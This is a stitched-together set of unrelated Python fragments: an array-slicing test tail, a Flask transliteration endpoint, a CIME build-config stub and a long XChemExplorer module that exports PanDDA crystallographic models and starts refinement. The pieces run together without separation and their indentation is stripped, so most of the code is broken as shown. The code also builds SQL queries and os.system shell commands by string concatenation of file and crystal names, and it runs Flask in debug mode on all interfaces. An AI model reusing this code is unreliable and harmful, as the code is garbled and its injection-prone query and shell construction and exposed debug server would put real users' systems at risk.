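assert data[2:5, :, :].shape == (3, 512, 512)          # frame slice
assert data[:, 20:40, 100:200].shape == (10, 20, 100)  # spatial crop
```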
if __name__ == '__main__':
    unittest.main()
# -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__)  # create the Flask app; the argument is the application package name
app.config['JSON_AS_ASCII'] = False  # allow non-ASCII (Korean) text in JSON responses
@app.route("/transliterate", methods=['GET'])
def transliterate():
    text = request.args.get('input')  # 'input' is the query parameter; renamed locally to avoid shadowing the built-in
    output = transliteration.run(text)
    learned = transliteration.is_learned(text)
    print(text, learned)
    return jsonify(output)
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
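The endpoint above can be exercised without starting the server by using Flask's built-in test client. In this sketch a trivial `fake_run` (string reversal) stands in for `Transliteration.run`, which needs the trained model; the `demo` app and handler name are illustrative:

```python
from flask import Flask, request, jsonify

demo = Flask(__name__)
demo.config['JSON_AS_ASCII'] = False

def fake_run(text):
    # placeholder for the seq2seq transliteration model
    return text[::-1]

@demo.route("/transliterate", methods=['GET'])
def transliterate_demo():
    return jsonify(fake_run(request.args.get('input', '')))

client = demo.test_client()
resp = client.get("/transliterate?input=abc")
# resp.get_json() == "cba"
```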
"""
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema)
# last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
class export_and_refine_ligand_bound_models(QtCore.QThread):
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
try:
progress_step = float(1/len(modelsDict))
except TypeError:
self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
            self.Logfile.warning('emapLigandDict: ' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
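The timestamps above come straight from the file system: each model's mtime is formatted with `'%Y-%m-%d %H:%M:%S'` so it can later be compared against the database record. A standalone sketch of that helper (`file_timestamp` is an illustrative name, and the temporary file is only for demonstration):

```python
import os
import tempfile
from datetime import datetime

def file_timestamp(path):
    """Modification time of `path`, formatted as used throughout this module."""
    return datetime.fromtimestamp(os.path.getmtime(path)).strftime('%Y-%m-%d %H:%M:%S')

# demonstrate on a throwaway file
with tempfile.NamedTemporaryFile(delete=False) as fh:
    tmp = fh.name
stamp = file_timestamp(tmp)
os.unlink(tmp)
```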
def find_new_models(self,modelsDict):
samples_to_export = {}
self.Logfile.hint('XCE will never export/ refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
                if difference.total_seconds() != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
            except (ValueError, IndexError) as e:
self.Logfile.error(str(e))
return samples_to_export
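`find_new_models` re-exports a model only when its on-disk timestamp differs from the database record; the comparison boils down to parsing both strings and checking the delta, as in this stdlib sketch (`model_is_newer` is an illustrative name):

```python
from datetime import datetime

FMT = '%Y-%m-%d %H:%M:%S'

def model_is_newer(timestamp_file, timestamp_db):
    """True if the on-disk model timestamp differs from the database one."""
    delta = datetime.strptime(timestamp_file, FMT) - datetime.strptime(timestamp_db, FMT)
    # total_seconds() also catches differences of exact whole days
    return delta.total_seconds() != 0
```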
def event_map_to_sf(self,resolution,emapLigandDict):
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
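`gemmi.Position.dist` used above is plain Euclidean distance; the 7 Å event-to-ligand cut-off can be reproduced with the standard library alone (`within_event_radius` and the coordinates below are illustrative):

```python
import math

def within_event_radius(event_xyz, ligand_xyz, cutoff=7.0):
    """True if the ligand centre of mass lies within `cutoff` Angstrom of the event."""
    distance = math.sqrt(sum((a - b) ** 2 for a, b in zip(event_xyz, ligand_xyz)))
    return distance < cutoff
```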
def refine_exported_model(self,xtal):
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
                        if difference.total_seconds() != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
                            advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
                                       'This is most likely because this was done with an older version of XCE. '
                                       'If you really want to export and refine this model, you need to open the database '
                                       'with DB Browser (sqlitebrowser.org); then change the RefinementOutcome field '
                                       'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
class run_pandda_export(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
self.import_samples_into_datasouce(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def import_samples_into_datasouce(self,samples_to_export):
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
self.Logfile.insert('reading pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
self.Logfile.insert('adding to site_list: ' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
for i,line in enumerate(csv_dict):
db_dict={}
sampleID=line['dtag']
if sampleID not in samples_to_export:
self.Logfile.warning('%s: not to be exported; will not add to panddaTable...' %sampleID)
continue
if sampleID not in pandda_hit_list:
pandda_hit_list.append(sampleID)
site_index=str(line['site_idx']).replace('.0','')
event_index=str(line['event_idx']).replace('.0','')
self.Logfile.insert(str(line))
self.Logfile.insert('reading {0!s} -> site {1!s} -> event {2!s}'.format(sampleID, site_index, event_index))
site_name=''
site_comment=''
for entry in site_list:
if entry[0]==site_index:
site_name=entry[1]
site_comment=entry[2]
break
# check if EVENT map exists in project directory
event_map=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*ccp4')):
filename=file[file.rfind('/')+1:]
if filename.startswith(sampleID+'-event_'+event_index) and filename.endswith('map.native.ccp4'):
event_map=file
self.Logfile.insert('found respective event maps in {0!s}: {1!s}'.format(self.initial_model_directory, event_map))
break
# initial pandda model and mtz file
pandda_model=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*pdb')):
filename=file[file.rfind('/')+1:]
if filename.endswith('-ensemble-model.pdb'):
pandda_model=file
if sampleID not in self.already_exported_models:
self.already_exported_models.append(sampleID)
break
inital_mtz=''
for file in glob.glob(os.path.join(self.initial_model_directory,sampleID,'*mtz')):
filename=file[file.rfind('/')+1:]
if filename.endswith('pandda-input.mtz'):
inital_mtz=file
break
db_dict['CrystalName'] = sampleID
db_dict['PANDDApath'] = self.panddas_directory
db_dict['PANDDA_site_index'] = site_index
db_dict['PANDDA_site_name'] = site_name
db_dict['PANDDA_site_comment'] = site_comment
db_dict['PANDDA_site_event_index'] = event_index
db_dict['PANDDA_site_event_comment'] = line['Comment'].replace("'","")
db_dict['PANDDA_site_confidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_InspectConfidence'] = line['Ligand Confidence']
db_dict['PANDDA_site_ligand_placed'] = line['Ligand Placed']
db_dict['PANDDA_site_viewed'] = line['Viewed']
db_dict['PANDDA_site_interesting'] = line['Interesting']
db_dict['PANDDA_site_z_peak'] = line['z_peak']
db_dict['PANDDA_site_x'] = line['x']
db_dict['PANDDA_site_y'] = line['y']
db_dict['PANDDA_site_z'] = line['z']
db_dict['PANDDA_site_ligand_id'] = ''
db_dict['PANDDA_site_event_map'] = event_map
db_dict['PANDDA_site_initial_model'] = pandda_model
db_dict['PANDDA_site_initial_mtz'] = inital_mtz
